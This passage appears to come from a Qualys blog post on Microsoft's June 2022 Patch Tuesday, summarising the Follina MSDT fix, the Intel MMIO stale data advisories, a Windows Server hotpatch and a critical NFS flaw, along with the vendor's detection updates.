[Intel-SA-00615](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>)).\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, and Spoofing vulnerabilities.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation in the wild with the exception of an update to [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>), a Microsoft Windows Support Diagnostic Tool (MSDT) vulnerability made public in May.\n\n### The June 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/06/15/microsoft-patches-55-vulnerabilities-including-one-zero-day-and-three-critical-in-the-june-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nMicrosoft has fixed the widely-exploited _**Windows Follina MSDT zero-day**_ vulnerability tracked as[ CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) in the June 2022 Updates.\n\nThe update for this vulnerability is in the June 2022 cumulative Windows Updates. Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to take any further action.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected._**\n\nOn May 31st Qualys released **QID 91909 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability (Follina) (Zero Day)**. \n \nOn June 14th, Microsoft released the patch for this vulnerability in the June 2022 cumulative Windows Updates. \n \nQualys will modify our existing detection signature to check for the PATCH ONLY and apply a minor title revision to remove the zero-day reference:** QID 91909 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution (RCE) Vulnerability (Follina).** \n \nQualys will also release a NEW Information Gathered (IG) detection that will test for the MITIGATION ONLY: **QID 45538 Microsoft Support Diagnostic Tool (MSDT) URL Protocol Vulnerability Disabled (Follina Mitigation Enabled).** \n \nThese updates will be included in the June 14th evening\u2019s Patch Tuesday release cycle. \n_(VULNSIGS-2.5.504-4, QAGENT-SIGNATURE-SET-2.5.504.4-3, LX_MANIFEST-2.5.504.4-4)_ \n--- \n \n\n\n _Examine a potential attack vector as well as technical details of Follina, and chart the ability to detect this new vulnerability using both Qualys Multi-Vector EDR and Qualys Context XDR._ [Detect the Follina MSDT Vulnerability (CVE-2022-30190) with Qualys Multi-Vector EDR & Context XDR](<https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr>)\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/05/31/microsoft-windows-support-diagnostic-tool-msdt-remote-code-execution-vulnerability-cve-2022-30190/>)\n\n* * *\n\n### Microsoft Guidance on Intel [Processor MMIO Stale Data Vulnerabilities](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>)\n\n#### [Microsoft Advisory 220002](<https://msrc.microsoft.com/update-guide/vulnerability/ADV220002>), [Intel-SA-00615](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>)\n\nOn June 14, 2022, Intel published information about a class of memory-mapped I/O vulnerabilities known as [Processor MMIO Stale Data Vulnerabilities](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html>).\n\nAn attacker who successfully exploited these vulnerabilities might be able to read privileged data across trust boundaries. In shared resource environments (such as exists in some cloud services configurations), these vulnerabilities could allow one virtual machine to improperly access information from another. In non-browsing scenarios on standalone systems, an attacker would need prior access to the system or an ability to run a specially crafted application on the target system to leverage these vulnerabilities.\n\nThese vulnerabilities are known as:\n\n * [CVE-2022-21123](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21123>) | Shared Buffer Data Read (SBDR) \n * [CVE-2022-21125](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21125>) | Shared Buffer Data Sampling (SBDS)\n * [CVE-2022-21127](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21127>) | Special Register Buffer Data Sampling Update (SRBDS Update)\n * [CVE-2022-21166](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21166>) | Device Register Partial Write (DRPW)\n\n**Important**: These vulnerabilities might affect other operating systems and service providers. We advise customers to seek guidance from their respective vendors.\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/06/15/microsoft-releases-patches-for-the-intel-processor-mmio-stale-data-vulnerabilities-in-june-2022-patch-tuesday/>)\n\n* * *\n\n### Windows Server 2022 Azure Edition Core Hotpatch ([KB5014677](<https://support.microsoft.com/en-us/topic/june-14-2022-kb5014677-os-build-20348-770-a7a0d557-bd34-4867-bf6f-a47fbc997810>)) **OS Build 20348.770**\n\nWindows Server 2022 Azure Edition Core Hotpatch ([KB5014677](<https://support.microsoft.com/en-us/topic/june-14-2022-kb5014677-os-build-20348-770-a7a0d557-bd34-4867-bf6f-a47fbc997810>)) addresses 22 unique vulnerabilities, ranging in severity from a CVSSv3.1 score of 5.3/10 to 8.8/10, as summarized below.\n\n\n\n* * *\n\n# **Microsoft Critical and Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jun>) covers multiple Microsoft product families, including Azure, Developer Tools, Edge-Chromium Browser, Microsoft Office, SQL Server, System Center, and Windows.\n\nA total of 25 unique Microsoft products/versions are affected.\n\nDownloads include Azure Hotpatch, Cumulative Updates, Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>) | Windows Network File System Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [CV
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
